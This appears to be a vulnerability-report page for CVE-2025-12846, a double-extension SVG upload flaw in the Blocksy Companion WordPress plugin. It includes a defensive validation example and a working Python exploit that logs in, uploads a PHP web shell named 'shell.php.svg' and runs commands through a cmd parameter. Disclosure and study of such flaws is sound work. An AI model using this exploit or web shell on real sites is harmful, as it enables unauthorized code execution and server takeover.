Security Vulnerability Report
CVE-2025-12846 CVSS 8.8 HIGH

CVE-2025-12846

Published: 2025-11-11 11:15:35
Last Modified: 2026-04-15 00:35:42

Description

The Blocksy Companion plugin for WordPress is vulnerable to authenticated arbitrary file upload in all versions up to, and including, 2.1.19. The cause is insufficient file type validation when detecting SVG files: a file with a double extension (for example a name ending in .php.svg) bypasses the filename sanitization while still being accepted as a valid SVG. This makes it possible for authenticated attackers with Author-level access or higher to upload arbitrary files to the affected site's server, which may lead to remote code execution.
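As an added example (not code from the plugin, from the PoC further down this page, or from the Wordfence advisory), the following Python illustrates the vulnerability class described above: a weak SVG upload check that trusts a trailing .svg plus "it parses as XML", beside a hardened check. Because a "<?php ... ?>" block is a well-formed XML processing instruction, a payload like the one in the PoC passes the weak check and "shell.php.svg" is stored with its inner .php segment intact. The hardened version collapses the stored name to a single extension, rejects executable inner extensions, refuses PHP open tags, DOCTYPE declarations and active SVG content (script elements, event-handler attributes, javascript: links), and ignores the client-declared MIME type except as a consistency check. The denylist, the sample uploads and the specific checks are assumptions for this illustration; the plugin's actual pre-fix logic is not shown on this page, only the changed file (framework/features/svg.php) in the references.

```python
"""Weak versus hardened SVG upload validation (illustration of CWE-434 as in
CVE-2025-12846). Example code added by the editor; not from the plugin or PoC."""
import re
import xml.etree.ElementTree as ET

SVG_ROOT = "{http://www.w3.org/2000/svg}svg"
# Assumed denylist for this example: inner extensions a PHP-capable web server
# might hand to an interpreter regardless of what follows them.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht", "phps"}
ACTIVE_TAGS = {"script", "foreignobject"}
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)


def weak_is_svg(filename, content):
    """Vulnerable pattern: a trailing '.svg' plus 'it parses as XML' is taken as
    proof of a benign SVG and the name is stored verbatim, double extension and all.
    A <?php ... ?> block is a well-formed processing instruction, so it parses."""
    if not filename.lower().endswith(".svg"):
        return False
    try:
        ET.fromstring(content)
    except ET.ParseError:
        return False
    return True


def hardened_svg_check(filename, declared_mime, content):
    """Return (accepted, detail). On success `detail` is the name to store, which
    always has exactly one extension; on failure it is the rejection reason."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or parts[-1] != "svg":
        return False, "extension is not .svg"
    if set(parts[1:-1]) & EXECUTABLE_EXTS:
        return False, "executable inner extension"
    if declared_mime != "image/svg+xml":
        return False, "declared MIME is not image/svg+xml"
    lowered = content.lower()
    if b"<?php" in lowered or b"<?=" in lowered:
        return False, "PHP open tag in content"
    if b"<!doctype" in lowered:
        return False, "DOCTYPE not allowed"
    try:
        root = ET.fromstring(content)
    except ET.ParseError:
        return False, "not well-formed XML"
    if root.tag != SVG_ROOT:
        return False, "root element is not <svg>"
    for el in root.iter():
        local = el.tag.split("}")[-1].lower()
        if local in ACTIVE_TAGS:
            return False, f"active element <{local}>"
        for attr, value in el.attrib.items():
            name = attr.split("}")[-1]
            if EVENT_ATTR.match(name):
                return False, f"event handler attribute: {name}"
            if name == "href" and value.strip().lower().startswith("javascript:"):
                return False, "javascript: URL in href"
    # Only the first name segment survives; everything else is discarded.
    base = re.sub(r"[^a-z0-9_-]", "", parts[0]) or "upload"
    return True, f"{base}.svg"


# Constructed sample uploads for the demonstration: name -> (declared MIME, body).
SAMPLES = {
    "logo.svg": ("image/svg+xml",
        b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>'),
    "shell.php.svg": ("image/svg+xml",
        b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg">'
        b'<script><?php system($_GET["cmd"]); ?></script></svg>'),
    "single-ext.svg": ("image/svg+xml",
        b'<svg xmlns="http://www.w3.org/2000/svg"><script><?php echo 1; ?></script></svg>'),
    "click.svg": ("image/svg+xml",
        b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect/></svg>'),
    "photo.svg": ("image/jpeg",
        b'<svg xmlns="http://www.w3.org/2000/svg"><rect/></svg>'),
}


def evaluate(samples=SAMPLES):
    """Run both checks over every sample.
    Returns {name: (weak_accepted, hardened_accepted, detail)}."""
    results = {}
    for name, (mime, body) in samples.items():
        accepted, detail = hardened_svg_check(name, mime, body)
        results[name] = (weak_is_svg(name, body), accepted, detail)
    return results


if __name__ == "__main__":
    for name, (weak, hard, detail) in evaluate().items():
        w = "accept" if weak else "reject"
        h = "accept" if hard else "reject"
        print(f"{name:16} weak={w:6} hardened={h:6} {detail}")
```

Running the block shows every constructed sample passing the weak check while only logo.svg survives the hardened one. The raw-byte scan for PHP open tags runs before XML parsing on purpose: the parser treats "<?php ... ?>" as a processing instruction and silently drops it, so a check that inspects only the parsed tree never sees the payload.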

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

Blocksy Companion (WordPress plugin), all versions <= 2.1.19
(No CPE configuration data is present in the NVD record; the affected range above is taken from the description.)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests

# CVE-2025-12846 PoC - Blocksy Companion SVG file upload
# Target: WordPress site with Blocksy Companion plugin <= 2.1.19
# Requires credentials for an account with Author-level access or higher.


def create_malicious_svg():
    """Create an SVG that is well-formed XML but carries a PHP payload.

    The <?php ... ?> block is a valid XML processing instruction, so an SVG
    parser accepts the file; a PHP interpreter would execute it instead."""
    svg_content = '''<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
  <script type="text/javascript">
    <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); exit; } ?>
  </script>
</svg>'''
    return svg_content


def upload_payload(target_url, username, password, nonce, filename='shell.php.svg'):
    """Log in to WordPress and upload the double-extension SVG via admin-ajax.php."""
    target_url = target_url.rstrip('/')
    session = requests.Session()

    # Log in to WordPress with the supplied Author (or higher) credentials
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1',
    }
    session.post(login_url, data=login_data)
    # A successful login sets a wordpress_logged_in_* cookie; stop if it is missing
    if not any(c.startswith('wordpress_logged_in_') for c in session.cookies.keys()):
        print("[-] Login failed: no wordpress_logged_in cookie received")
        return False

    # Upload via the AJAX action this PoC assumes the plugin registers.
    # The action name is as given in the original PoC and has not been
    # verified against the plugin source referenced below.
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"
    files = {
        'file': (filename, create_malicious_svg(), 'image/svg+xml'),
    }
    data = {
        'action': 'ct_companion_upload_svg',
        'nonce': nonce,  # a valid nonce must be taken from an authenticated page first
    }
    resp = session.post(upload_url, files=files, data=data)

    if resp.status_code == 200:
        print(f"[+] Upload request accepted for {filename}")
        print("[+] Inspect the response for the stored path under wp-content/uploads/")
        print(f"[+] Response: {resp.text[:500]}")
        print("[+] If the server executes the file as PHP, run a command with ?cmd=whoami")
        return True
    print(f"[-] Upload failed ({resp.status_code}): {resp.text[:500]}")
    return False


if __name__ == '__main__':
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <nonce>")
        sys.exit(1)
    upload_payload(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])

References

Plugin changeset touching framework/features/svg.php: https://plugins.trac.wordpress.org/changeset/3391933/blocksy-companion/trunk/framework/features/svg.php
Wordfence advisory: https://www.wordfence.com/threat-intel/vulnerabilities/id/f8615422-5db7-495d-9956-7d6f658f42bf?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12846", "sourceIdentifier": "[email protected]", "published": "2025-11-11T11:15:35.060", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Blocksy Companion plugin for WordPress is vulnerable to authenticated arbitrary file upload in all versions up to, and including, 2.1.19. This is due to insufficient file type validation detecting SVG files, allowing double extension files to bypass sanitization while being accepted as a valid SVG file. This makes it possible for authenticated attackers, with author level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3391933/blocksy-companion/trunk/framework/features/svg.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f8615422-5db7-495d-9956-7d6f658f42bf?source=cve", "source": "[email protected]"}]}}